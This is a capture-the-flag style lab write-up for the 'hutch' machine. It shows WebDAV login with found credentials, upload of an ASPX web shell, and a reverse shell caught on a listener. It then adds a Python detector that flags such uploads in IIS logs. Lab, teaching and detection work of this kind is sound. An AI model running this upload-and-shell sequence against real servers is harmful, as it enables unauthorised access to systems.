WebDAV
It has been identified that the target web server has WebDAV enabled. While it requires authentication, I will attempt to authenticate using the credentials of the fmcsorley user: CrabSharkJellyfish192
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch]
└─$ cadaver http://$IP/
Authentication required for 192.168.187.122 on server `192.168.187.122':
Username: fmcsorley
Password: CrabSharkJellyfish192
dav:/>
Successfully authenticated
dav:/> ls
Listing collection `/': succeeded.
Coll: aspnet_client 0 Nov 4 2020
iisstart.htm 703 Nov 4 2020
iisstart.png 99710 Nov 4 2020
index.aspx 1241 Nov 4 2020
While there is nothing notable in the web root directory, I could attempt to upload an ASPX shell to gain a foothold
ASPX Shell Upload
dav:/> put shell.aspx
Uploading shell.aspx to `/shell.aspx':
Progress: [=============================>] 100.0% of 3445 bytes succeeded.
dav:/> ls
Listing collection `/': succeeded.
Coll: aspnet_client 0 Nov 4 2020
iisstart.htm 703 Nov 4 2020
iisstart.png 99710 Nov 4 2020
index.aspx 1241 Nov 4 2020
shell.aspx 3445 May 1 16:57
Successfully uploaded the ASPX payload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch]
└─$ curl -s http://$IP/shell.aspx
Invoking…
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.204] from (UNKNOWN) [192.168.187.122] 51173
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv> whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv> hostname
hostname
hutchdc
c:\windows\system32\inetsrv> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::9df9:8e58:4400:9b3a%3
IPv4 Address. . . . . . . . . . . : 192.168.187.122
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.187.254
Initial foothold established on the target system as the iis apppool\defaultapppool account by uploading an ASPX shell to the target WebDAV instance
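From the defender's side, the sequence above (an authenticated WebDAV PUT of an .aspx file, then a request that runs it) is recorded in the IIS W3C access log. The following is an added example, not part of the original write-up: a small detector for that pattern. The log lines, addresses and the user name alice are constructed, the field order assumes the default IIS W3C layout, and the extension list is an assumption to tune per site.

```python
# Added example: flag WebDAV PUTs of server-executable files in IIS W3C logs
# and any later request for the same path. Sample log lines are constructed.
EXEC_EXT = (".aspx", ".asp", ".ashx", ".asmx")  # assumed list; tune per site

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-05-01 16:56:40 10.0.0.5 PROPFIND / - 80 alice 10.0.0.99 cadaver/0.23.3+neon/0.31.2 - 207 0 0 15
2024-05-01 16:57:02 10.0.0.5 PUT /shell.aspx - 80 alice 10.0.0.99 cadaver/0.23.3+neon/0.31.2 - 201 0 0 31
2024-05-01 16:57:30 10.0.0.5 PUT /notes.txt - 80 alice 10.0.0.99 cadaver/0.23.3+neon/0.31.2 - 201 0 0 12
2024-05-01 16:58:11 10.0.0.5 GET /shell.aspx - 80 - 10.0.0.99 curl/8.5.0 - 200 0 0 120
2024-05-01 16:59:00 10.0.0.5 GET /index.aspx - 80 - 10.0.0.77 Mozilla/5.0 - 200 0 0 8
"""

def parse_w3c(text):
    """Yield one dict per log entry, using the #Fields directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if fields and len(values) == len(fields):  # skip malformed rows
                yield dict(zip(fields, values))

def find_uploaded_scripts(text):
    """Return successful PUTs of executable extensions plus follow-up requests."""
    uploads = {}
    for e in parse_w3c(text):
        uri, when = e["cs-uri-stem"].lower(), f'{e["date"]} {e["time"]}'
        if (e["cs-method"] == "PUT" and e["sc-status"].startswith("2")
                and uri.endswith(EXEC_EXT)):
            uploads[uri] = {"uri": uri, "user": e["cs-username"], "src": e["c-ip"],
                            "uploaded": when, "requests": []}
        elif e["cs-method"] in ("GET", "POST") and uri in uploads:
            # Any request after the upload is a sign the file was executed.
            uploads[uri]["requests"].append((when, e["c-ip"], e["sc-status"]))
    return list(uploads.values())

if __name__ == "__main__":
    for f in find_uploaded_scripts(SAMPLE_LOG):
        print(f"PUT {f['uri']} by {f['user']} from {f['src']} at {f['uploaded']}")
        for when, ip, status in f["requests"]:
            print(f"  requested {when} from {ip} -> {status}")
```

A hit with a follow-up request is a reason to check whether WebDAV write access and script execution are both allowed on the same directory, and to review what the uploading account is permitted to write.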